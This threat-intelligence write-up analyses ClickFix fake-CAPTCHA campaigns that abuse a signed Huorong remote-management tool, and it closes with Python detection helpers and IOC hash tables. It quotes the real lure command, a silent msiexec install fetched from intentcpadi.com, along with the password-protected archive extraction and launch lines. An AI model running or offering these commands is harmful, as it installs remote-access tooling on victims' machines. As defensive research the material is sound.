Huorong Security Management Weaponized in ClickFix Attacks
Huorong is a Beijing-based security company that offers an Endpoint Security Management System suite for enterprise and government customers. In newly observed ClickFix attacks, the Huorong EDR product is abused as an entry point into compromised systems. The Huorong Configuration Manager is bundled into an MSI built with Advanced Installer and installed on victim devices, giving the malicious actors complete control over the device. The installer is delivered through compromised domains serving ClickFix (FakeCAPTCHA) lures.
Incident Overview
Like most ClickFix-related incidents, a legitimate domain was compromised and abused to serve a ClickFix lure. This write-up focuses on an incident identified on January 30th, 2026. It is the second incident I have observed using this Advanced Installer method.
The first incident, “AICAgo”, involved the American Indian Center of Arkansas domain. Below, the two are referred to as “Incident One” (AICAgo) and “Incident Two” (Culligan Water).
The Culligan Water domain was compromised by an unknown threat actor and implanted with a script serving a malicious ClickFix lure. The lure asked users to follow the standard Win+R, Ctrl+V, Enter steps.
The command copied to the clipboard was an msiexec command that reaches out to a remote domain to install an MSI:
MsiExEC.exe -pAcKaGe http:\\intentcpadi.com\system32\..\VerificationID\..\466943 /q
The command dresses the URL up with directory-traversal segments as part of the social-engineering lure. The functional URL is intentcpadi.com/466943; the system32 and VerificationID segments are each cancelled out by the dot-dot-slash (..) that follows them, so they never form part of the requested path. This lends the command a veneer of legitimacy without relying on the appended comment often seen in other ClickFix lures.
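As an added example (not code from the write-up), the Python triage helper below reverses the trick described above: it finds the package URL in an msiexec command line, treats the backslashes as path separators, collapses the `..` segments, and reports the effective download address, the number of traversal segments and whether the install was requested silently. The `suspicious` verdict at the end is a heuristic of my own, not a vendor rule, and the sample command is the one quoted above.

```python
import posixpath
import re
from urllib.parse import urlsplit, urlunsplit

# The clipboard command observed in Incident Two, copied from the write-up.
OBSERVED_CMD = r"MsiExEC.exe -pAcKaGe http:\\intentcpadi.com\system32\..\VerificationID\..\466943 /q"

URL_RE = re.compile(r"(?i)^https?:")


def normalize_msi_url(raw: str) -> str:
    """Return the address a backslash-laden, '..'-padded package URL resolves to.

    Backslashes are treated as path separators (as in the observed command) and
    dot-dot segments are collapsed with posixpath.normpath, so the observed
    URL becomes http://intentcpadi.com/466943.
    """
    parts = urlsplit(raw.replace("\\", "/"))
    path = posixpath.normpath(parts.path) if parts.path else "/"
    if not path.startswith("/"):
        path = "/" + path
    return urlunsplit((parts.scheme.lower(), parts.netloc.lower(), path, parts.query, parts.fragment))


def triage_msiexec(cmdline: str) -> dict:
    """Pull the facts a responder wants out of an msiexec command line."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    result = {"is_msiexec": False, "remote_package": None, "effective_url": None,
              "traversal_segments": 0, "quiet": False, "suspicious": False}
    if not tokens:
        return result
    exe = posixpath.basename(tokens[0].replace("\\", "/")).lower()
    result["is_msiexec"] = exe in ("msiexec", "msiexec.exe")
    if not result["is_msiexec"]:
        return result
    # Switches may use '/' or '-' and any casing ("-pAcKaGe", "/q").
    switches = {t.lstrip("/-").lower() for t in tokens[1:] if t[:1] in ("/", "-") and len(t) > 1}
    result["quiet"] = any(s.startswith("q") for s in switches)
    urls = [t for t in tokens[1:] if URL_RE.match(t)]
    if urls:
        raw = urls[0]
        result["remote_package"] = raw
        result["effective_url"] = normalize_msi_url(raw)
        # Count only real ".." segments, not names that merely start with two dots.
        result["traversal_segments"] = len(re.findall(r"/\.\.(?=/|$)", raw.replace("\\", "/")))
    # Heuristic (my own, not a vendor rule): a remote package fetched silently or
    # padded with '..' segments deserves a closer look.
    result["suspicious"] = result["remote_package"] is not None and (
        result["traversal_segments"] > 0 or result["quiet"]
    )
    return result


if __name__ == "__main__":
    for key, value in triage_msiexec(OBSERVED_CMD).items():
        print(f"{key}: {value}")
```

Feeding the helper a command line taken from clipboard telemetry or a process-creation event gives the real destination to block or hunt for, rather than the decoy path a reader sees at first glance.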
The remote MSI is built with Advanced Installer. It contains the typical Advanced Installer resources: the installer's strings, font choices, and other UI elements. The installer executable is named Binary.viewer.exe. Additionally, there is a bundled CAB file named disk1, which contains an encrypted 7-Zip archive and a packaged 7-Zip Reduced Standalone Console binary.
The installer's text describes it as a “PDF Toolkit”. The “PDF Toolkit” carried a different name in each incident but functioned identically:
Incident 1 (AICAgo): SlatePDF Office Toolkit
Incident 2 (Culligan Water): ClearForm PDF Platform
A directory named after the “PDF Toolkit” is created under the user's %APPDATA% directory, and the encrypted 7-Zip archive is decrypted and extracted there:
/HideWindow /dir "%APPDATA%\ClearForm Software Solutions OÜ\ClearForm PDF Platform\inst1282026\" "%APPDATA%\ClearForm Software Solutions OÜ\ClearForm PDF Platform\inst1282026\upd.exe" x "%APPDATA%\ClearForm Software Solutions OÜ\ClearForm PDF Platform\inst1282026\u.7z" -p6321282026 -o"%APPDATA%\ClearForm Software Solutions OÜ\ClearForm PDF Platform\inst1282026\" -y
Once the files have been extracted, the Advanced Installer process starts u.exe, the Huorong Configuration Manager:
/DontWait "%APPDATA%\ClearForm Software Solutions OÜ\ClearForm PDF Platform\inst1282026\\u\u.exe"
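The extraction-and-launch chain above is a useful detection opportunity. As an added example, not part of the original write-up, the Python below runs a simple check over constructed process-creation events modelled on this incident (the PIDs, the msiexec parent, the signer string and the benign 7-Zip event are all assumptions for illustration; the paths and switches follow the two command lines above). It looks for a password-protected 7-Zip extraction into the roaming profile and then for any binary executed from the directory it extracted to. A valid vendor signature on that binary is reported, not trusted.

```python
import re
from dataclasses import dataclass

# Extraction into the roaming profile, whether the event logged "%APPDATA%" literally
# or the expanded "...\AppData\Roaming\..." form.
APPDATA_RE = re.compile(r"(?i)(%APPDATA%|\\AppData\\Roaming)\\")
# 7-Zip style extraction: an "x" verb, a .7z archive, and a -p<password> switch on the same line.
PW_EXTRACT_RE = re.compile(r'(?i)(^|\s)x\s+"?[^"]+?\.7z"?(?=\s).*\s-p\S+')
# The -o<dir> output switch, quoted or bare.
OUTDIR_RE = re.compile(r'(?i)\s-o(?:"([^"]+)"|(\S+))')


@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed; mirrors the fields of Sysmon event 1)."""
    pid: int
    ppid: int
    image: str
    cmdline: str
    signer: str = ""  # Authenticode signer as an EDR would report it; "" if unsigned


def find_staging_chains(events):
    """Return one finding per password-protected 7-Zip extraction into %APPDATA% that is
    followed by execution of a binary from the extraction directory.
    Events are assumed to be in chronological order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for i, ev in enumerate(events):
        if not PW_EXTRACT_RE.search(ev.cmdline):
            continue
        m = OUTDIR_RE.search(ev.cmdline)
        out_dir = (m.group(1) or m.group(2)) if m else ""
        if not APPDATA_RE.search(out_dir):
            continue
        prefix = out_dir.rstrip("\\").lower() + "\\"
        launched = [
            {"pid": e.pid, "image": e.image,
             "signer": e.signer or "unsigned",
             "same_parent": e.ppid == ev.ppid}
            for e in events[i + 1:]
            if e.image.lower().startswith(prefix)
        ]
        if launched:
            parent = by_pid.get(ev.ppid)
            findings.append({
                "extractor_pid": ev.pid,
                "parent_image": parent.image if parent else None,
                "out_dir": out_dir,
                "launched": launched,
            })
    return findings


# Constructed sample events modelled on Incident Two. PIDs, the parent process and the
# signer string are assumptions; the paths and switches follow the write-up.
STAGE = r"%APPDATA%\ClearForm Software Solutions OÜ\ClearForm PDF Platform\inst1282026"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\System32\msiexec.exe",
              r"MsiExEC.exe -pAcKaGe http:\\intentcpadi.com\system32\..\VerificationID\..\466943 /q"),
    ProcEvent(200, 100, STAGE + r"\upd.exe",
              f'"{STAGE}\\upd.exe" x "{STAGE}\\u.7z" -p6321282026 -o"{STAGE}\\" -y'),
    ProcEvent(300, 100, STAGE + r"\u\u.exe", f'"{STAGE}\\u\\u.exe"',
              signer="Huorong (placeholder signer name)"),
    # Benign: an interactive 7-Zip extraction with no password, outside the roaming profile.
    ProcEvent(400, 1, r"C:\Program Files\7-Zip\7z.exe",
              r"7z.exe x C:\Users\alice\Downloads\backup.7z -oC:\Users\alice\Documents"),
]

if __name__ == "__main__":
    for f in find_staging_chains(SAMPLE_EVENTS):
        print(f"extractor pid {f['extractor_pid']} (parent {f['parent_image']}) staged into {f['out_dir']}")
        for hit in f["launched"]:
            print(f"  launched {hit['image']} signer={hit['signer']} same_parent={hit['same_parent']}")
```

The check keys on behaviour the lure cannot easily change (a password-protected archive unpacked into the user's profile, then a binary run from that same directory under the installer's process tree), so it still fires if the actor swaps the Huorong component for another signed tool.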
The files extracted from the archive include the Huorong Configuration Manager (u.exe) and several custom DLLs used by the Configuration Manager. These files are signed with a valid Huorong certificate.
Notably, the first incident used the Huorong Internet Security Log Viewer instead of the Huorong Configuration Manager. It is unknown why the payload differed between the two incidents. The DLLs were the same in both, although the Configuration Manager bundle included more of them.
The Huorong Endpoint Security Management System supports remote desktop access. The client is configured to prompt the user to “allow” or “deny” the connection; however, if there is no response within 30 seconds, it connects automatically (Huorong).
The product also supports remote connections through its remote assistance function, which can be configured to operate silently, with no notification to the user (Huorong).
Note: Both of those pages were machine translated. There may be errors in the translation. I don’t read Chinese.
It is likely that a successful compromise would involve either hands-on-keyboard activity or automated post-compromise activity. Unfortunately, I do not have a method of testing or observing post-compromise behaviors currently.
IOCs
These are formatted terribly. It kind of works though lol
Incident One: AICAgo
Network/Lure
| Domain | Notes |
|---|---|
| aicago.org | Compromised Domain |
| dorisproperties.com | MSI Delivery |
MSI
| Name | Hash |
|---|---|
| upd5.msi | 0659F83185C20068793B4651F2BC025E8366BD78B321E94684D1C7385DB54D47 |
MSI Contents
| Name | Hash |
|---|---|
| !_Columns | 7CD65AE2A9D01FF4BC1870BA9004331F6260B1C62BE83415F9977F987C70BFF6 |
| !_StringData | 59E4498890E237CA2720185A9E827C14666E3150AA4BE1B2566ACD30700DEC31 |
| !_StringPool | 2C4307925797A0C6D99A59769D35E1432ED63A097873BA08C34031F2C369BF96 |
| !_Tables | 3E35843FD86754C9035FB8F58A4BA014C90FA5ADA5342C71DB2125A7F3E792C8 |
| !_Validation | 8BA3E771B00BCCC06B4D5422AC8619790BE23CE37D0EB21ED45E0A588EB0E520 |
| !ActionText | 8DDF3ECE54C773BC9326D796DF007922A70BDBC96A2B79551C6D9AC14CC2FD7C |
| !AdminExecuteSequence | 727D03574EC08C7497133A9167DA8EB8F67EA6D7451DE5521051AAC108E270BC |
| !AdminUISequence | 3A2BC99F2BC94C7D48F36B4949F6B4EFE5EAF7624ADBA4B77CD6BBDBC58DEBAE |
| !AdvtExecuteSequence | F858747A92E6DF6939C270EDA54D6D6EA9BF5DA3952E8C57D3CED96754AA72EB |
| !Binary | 2EA7D81194F0013056C4777A3C0C5768D829531CA95323BB050E7BEF3B9F2685 |
| !BootstrapperUISequence | 247A75BE20F77A500E95C9A204E3F8BCAFC522EECAF45F58744C789B2144E7B8 |
| !CheckBox | 00F5047F7D2C46B101138D309ECAF74EDB5E5735B18FDF78AB34A91A8D4C445F |
| !Component | 1133E479A0FAE2188174B2EB4C0A046C532F13CDF034613968573D13AFDB460F |
| !Control | 458E4CBBDDA525AC0B2E689C7D1FFD52119D0895FD999073A2FCE3921328207E |
| !ControlCondition | A0C386C95C7DB1B8FA87489FA5BC23328744794F3D96D83FF4DA9EEB84AAE6BF |
| !ControlEvent | 7CDB452680805066EB401563225951D3AC7BD10C78C8EF2AADECED5E988E9F7D |
| !CreateFolder | BCCCAE1D91009180F4B87F7F3551EC2C13D40CBE01BABCC0B037CD9BA36ED01D |
| !CustomAction | F51D8D043D48F42CDD1D8A54943ADD5F0F5CAE248A134BD6B1AFA15CF1C246C8 |
| !Dialog | 94097893A253762F516D11DEDE79096E2878E42BFB936556748E3F761AA37C1B |
| !Directory | 529DBEE29197AED62D0D9062FAA0E90B262D378763C0051625486C0FAEC235F5 |
| !Error | DF0FC37D473C3779ADE1D93372E5A79B0EF30C2BC951B93FB5E50E4494B31A56 |
| !EventMapping | 5A0BE97B0D267E1D87D9CFF667E8ABE9FE3A6F8E515179DE42AD643C99D7CD11 |
| !Feature | 1FDF708D5FAC4A31A6C5487577A277DFE02048D130EA7DE3EA365162E9BBB38D |
| !FeatureComponents | 107DFED7F98B11A0E5DBB6B884A6D8E5A7D1791FE518BC901084CD765B46002E |
| !File | FFD2AB9A5ACEF3B2A9B9A1FE5F0813CC2F86CD9FFDD6F9D356608728D119A72F |
| !InstallExecuteSequence | 4748AA1A659BC0AB887F8725D5FCA36229F87BA08E23E3B85AB36711C3211523 |
| !InstallUISequence | E8A21DE0C29ADC474318C3005F8D11FABF0304FAB2182BF9E9725201A2F03EB9 |
| !LaunchCondition | A0AB0EB933C1BA1D06DFA3202BB7963A770FF0F1E68A14C58CE4BB19BC08D51E |
| !Media | 669CC3BC9DF86F4DF11A1456A97934C1CBC0063583AF8A2EC318AA07AB4E3435 |
| !Property | 4B447584637335CD69038BE3D7AEE705447F09F777CD8623966ADC46C2C335ED |
| !RadioButton | 835A19C417ECC834DB58F506BFB386C4FFDA1BBD9BB91F00510CCC8CF0F2EE75 |
| !Registry | C4267E281A6AFADA0ECD07A20957ECD69170E76F74F60B1DF5650618C83C5AD5 |
| !TextStyle | D07C544D19E0BAA1E19378AAE8D06EE64AC8D83930A03CF1C6EE93D92D8A9A41 |
| !UIText | B39F86E1ED9065C132484F66EE1CF299691715D67F72BB6A1469DE73F3137EEA |
| !Upgrade | 4EAF016B83242D47AB9736B8CC7D123A1EB90E6937E1932D3B2E9AADBCF74A7E |
| [5]SummaryInformation | |
| Binary.banner.scale125.jpg | 3C081097DCA98557B27C1949496CEDC94F1B8F6A952D6B106E312E0239BC5B21 |
| Binary.banner.scale150.jpg | 0416B1888148611C4716CBBE253C8F73F075E4F926C3CC4F93D38D230EF7B4A1 |
| Binary.banner.scale200.jpg | 033171062CD540EC84CE4998719D0DCAE564AA69646D437DC4DC4CD8EFD0F6FA |
| Binary.banner.svg | 865B031B2C344B5558F7712E1424251631247C86A7D835AE263AD948016A35A0 |
| Binary.dialog.scale125.jpg | 557059C8C0488F9F9681A16AC5448BA8470321CF40E63526499C5151177D59A7 |
| Binary.dialog.scale150.jpg | B82327CBF824FDF633C20B13C19A91FAA950F18C580675F2AB49F8CC7BA77FA4 |
| Binary.dialog.scale200.jpg | F192D3EC0EC36BDD0614A61851F73714DB8D68900F891760AC30A33C2741D4DD |
| Binary.dialog.svg | 135CC57F4BBC69C47464D4CF315AD7BA4852FD956D40DD86B6D3FBA3373DF28C |
| Binary.viewer.exe | 9600A99A4B058AFF17C30EB551DC21FA6E0C83EC787FA007F0C7F0752471804D |
| disk1.cab | B55E3591A351D195D7749EB16D541D8277A3D639B6687FDEE98BC463CFE20B7D |
Extracted Huorong Files
| Name | Hash |
|---|---|
| DuiLib.dll | AB898EB40C12C14363061D687BFCCC3A82E362D799EACFAEA96B57D78D7D0A2D |
| HipsDB.dll | BE3BFCADBE526E95C986C9F068E1469DCE171388A3D36E66D4FA97CDFDAC1F35 |
| jansson.dll | 5AB560BA25605087F7A449527AD5B7A3686E1F9FCA1ABB0A1A7612F57CD89DF2 |
| libxsse.dll | 8B4D95270FBD44385DC5A6CD96410479E0BD2A9280FE618931DE9EB9DA4841F0 |
| selfprot.dll | C780269D3053D1CC34518D0112700FBA34BA6EE65C3D50683DCF77A946F7DA4A |
| sqlite.dll | F323C011BAE2A141AD31E9D494028FD9B201E1F976B2C4D48CA82790C5D7D9D4 |
| uactmon.dll | B548468B39EDF0DABD6A122ECDA4E19F6B99D256D8A331ED32E8B02D21A6522B |
| upd.exe | B4812F8AD93EF283CB67E896D31528871563D92B1309BFB976DCB1C855F47FCF |
| usysdiag.dll | 605C25BAB889274F2ACAEDCE496862CFCBA26102F24CE19FF86BF0CEA4F3D5AE |
Incident Two: Culligan Water
Network/Lure
| Domain | Notes |
|---|---|
| culliganwater.com | Compromised Domain |
| intentcpadi.com | MSI Delivery |
MSI
| Name | Hash |
|---|---|
| CoreCCN.msi | CF6E316E5B3D011A87FCF1F0F7B0AB8CF5AD98551E1DB3E5AC3362287A39922B |
MSI Contents
| Name | Hash |
|---|---|
| !_Columns | 7CD65AE2A9D01FF4BC1870BA9004331F6260B1C62BE83415F9977F987C70BFF6 |
| !_StringData | E470E99619001FCD4BF2D3B440D5774F75B718799A671C33EB355EE797EAB7DC |
| !_StringPool | 494C56313FDF16A79EB9472F109AFF6282E66721772CEFAF957E45D321F320D0 |
| !_Tables | 3E35843FD86754C9035FB8F58A4BA014C90FA5ADA5342C71DB2125A7F3E792C8 |
| !_Validation | 8BA3E771B00BCCC06B4D5422AC8619790BE23CE37D0EB21ED45E0A588EB0E520 |
| !ActionText | 8DDF3ECE54C773BC9326D796DF007922A70BDBC96A2B79551C6D9AC14CC2FD7C |
| !AdminExecuteSequence | 727D03574EC08C7497133A9167DA8EB8F67EA6D7451DE5521051AAC108E270BC |
| !AdminUISequence | 3A2BC99F2BC94C7D48F36B4949F6B4EFE5EAF7624ADBA4B77CD6BBDBC58DEBAE |
| !AdvtExecuteSequence | F858747A92E6DF6939C270EDA54D6D6EA9BF5DA3952E8C57D3CED96754AA72EB |
| !Binary | 2EA7D81194F0013056C4777A3C0C5768D829531CA95323BB050E7BEF3B9F2685 |
| !BootstrapperUISequence | 247A75BE20F77A500E95C9A204E3F8BCAFC522EECAF45F58744C789B2144E7B8 |
| !CheckBox | 00F5047F7D2C46B101138D309ECAF74EDB5E5735B18FDF78AB34A91A8D4C445F |
| !Component | 1133E479A0FAE2188174B2EB4C0A046C532F13CDF034613968573D13AFDB460F |
| !Control | 458E4CBBDDA525AC0B2E689C7D1FFD52119D0895FD999073A2FCE3921328207E |
| !ControlCondition | A0C386C95C7DB1B8FA87489FA5BC23328744794F3D96D83FF4DA9EEB84AAE6BF |
| !ControlEvent | 7CDB452680805066EB401563225951D3AC7BD10C78C8EF2AADECED5E988E9F7D |
| !CreateFolder | BCCCAE1D91009180F4B87F7F3551EC2C13D40CBE01BABCC0B037CD9BA36ED01D |
| !CustomAction | F51D8D043D48F42CDD1D8A54943ADD5F0F5CAE248A134BD6B1AFA15CF1C246C8 |
| !Dialog | 94097893A253762F516D11DEDE79096E2878E42BFB936556748E3F761AA37C1B |
| !Directory | 529DBEE29197AED62D0D9062FAA0E90B262D378763C0051625486C0FAEC235F5 |
| !Error | DF0FC37D473C3779ADE1D93372E5A79B0EF30C2BC951B93FB5E50E4494B31A56 |
| !EventMapping | 5A0BE97B0D267E1D87D9CFF667E8ABE9FE3A6F8E515179DE42AD643C99D7CD11 |
| !Feature | 1FDF708D5FAC4A31A6C5487577A277DFE02048D130EA7DE3EA365162E9BBB38D |
| !FeatureComponents | 107DFED7F98B11A0E5DBB6B884A6D8E5A7D1791FE518BC901084CD765B46002E |
| !File | E09BC30AC00D3D05EAA0F730B4E277821453D2744EB5992BE365A2B6965A3BD8 |
| !InstallExecuteSequence | 4748AA1A659BC0AB887F8725D5FCA36229F87BA08E23E3B85AB36711C3211523 |
| !InstallUISequence | E8A21DE0C29ADC474318C3005F8D11FABF0304FAB2182BF9E9725201A2F03EB9 |
| !LaunchCondition | A0AB0EB933C1BA1D06DFA3202BB7963A770FF0F1E68A14C58CE4BB19BC08D51E |
| !Media | 669CC3BC9DF86F4DF11A1456A97934C1CBC0063583AF8A2EC318AA07AB4E3435 |
| !Property | 4B447584637335CD69038BE3D7AEE705447F09F777CD8623966ADC46C2C335ED |
| !RadioButton | 835A19C417ECC834DB58F506BFB386C4FFDA1BBD9BB91F00510CCC8CF0F2EE75 |
| !Registry | C4267E281A6AFADA0ECD07A20957ECD69170E76F74F60B1DF5650618C83C5AD5 |
| !TextStyle | D07C544D19E0BAA1E19378AAE8D06EE64AC8D83930A03CF1C6EE93D92D8A9A41 |
| !UIText | B39F86E1ED9065C132484F66EE1CF299691715D67F72BB6A1469DE73F3137EEA |
| !Upgrade | 4EAF016B83242D47AB9736B8CC7D123A1EB90E6937E1932D3B2E9AADBCF74A7E |
| [5]SummaryInformation | |
| Binary.banner.scale125.jpg | 3C081097DCA98557B27C1949496CEDC94F1B8F6A952D6B106E312E0239BC5B21 |
| Binary.banner.scale150.jpg | 0416B1888148611C4716CBBE253C8F73F075E4F926C3CC4F93D38D230EF7B4A1 |
| Binary.banner.scale200.jpg | 033171062CD540EC84CE4998719D0DCAE564AA69646D437DC4DC4CD8EFD0F6FA |
| Binary.banner.svg | 865B031B2C344B5558F7712E1424251631247C86A7D835AE263AD948016A35A0 |
| Binary.dialog.scale125.jpg | 557059C8C0488F9F9681A16AC5448BA8470321CF40E63526499C5151177D59A7 |
| Binary.dialog.scale150.jpg | B82327CBF824FDF633C20B13C19A91FAA950F18C580675F2AB49F8CC7BA77FA4 |
| Binary.dialog.scale200.jpg | F192D3EC0EC36BDD0614A61851F73714DB8D68900F891760AC30A33C2741D4DD |
| Binary.dialog.svg | 135CC57F4BBC69C47464D4CF315AD7BA4852FD956D40DD86B6D3FBA3373DF28C |
| Binary.viewer.exe | 9600A99A4B058AFF17C30EB551DC21FA6E0C83EC787FA007F0C7F0752471804D |
| disk1.cab | BBA0A09D19845CEA9DDE8CDBC13FB2B3FC5052E6C375E846F24B52C802B9ECEF |
Extracted Huorong Files
| Name | Hash |
|---|---|
| DuiLib.dll | AB898EB40C12C14363061D687BFCCC3A82E362D799EACFAEA96B57D78D7D0A2D |
| HipsDB.dll | BE3BFCADBE526E95C986C9F068E1469DCE171388A3D36E66D4FA97CDFDAC1F35 |
| hrcomm.dll | DF6D896B0E51AC173810E6804605B6695E262A36322C9BEF2C004BD4B29B314E |
| jansson.dll | 5AB560BA25605087F7A449527AD5B7A3686E1F9FCA1ABB0A1A7612F57CD89DF2 |
| libcurl.dll | B1C446F737044A8C82DAD6456603ACD285F68693E6B92E73D6CE3F65CA9FEFE6 |
| libxsse.dll | 8B4D95270FBD44385DC5A6CD96410479E0BD2A9280FE618931DE9EB9DA4841F0 |
| logger.dll | 265A8DDA15610BB468FE14B144BE3E6179BF1AEB185D590D59C3E7B76F8982C2 |
| selfprot.dll | 4BF036040348222FA616B20D83E1E9F566389C453614F23CBB4D03A5DC441237 |
| sqlite.dll | F323C011BAE2A141AD31E9D494028FD9B201E1F976B2C4D48CA82790C5D7D9D4 |
| u.exe | 05D2B96B2923B447A9A7C9A3BC73EDF2C0BB48654726E33FAC988BF0CAE446BE |
| uactmon.dll | B548468B39EDF0DABD6A122ECDA4E19F6B99D256D8A331ED32E8B02D21A6522B |
| upgrade.dll | C2FEBAE3E5929289D4633161DD007FC1B75993CBD1AB98AC12EA6F062A61EBF7 |
| usysdiag.dll | 605C25BAB889274F2ACAEDCE496862CFCBA26102F24CE19FF86BF0CEA4F3D5AE |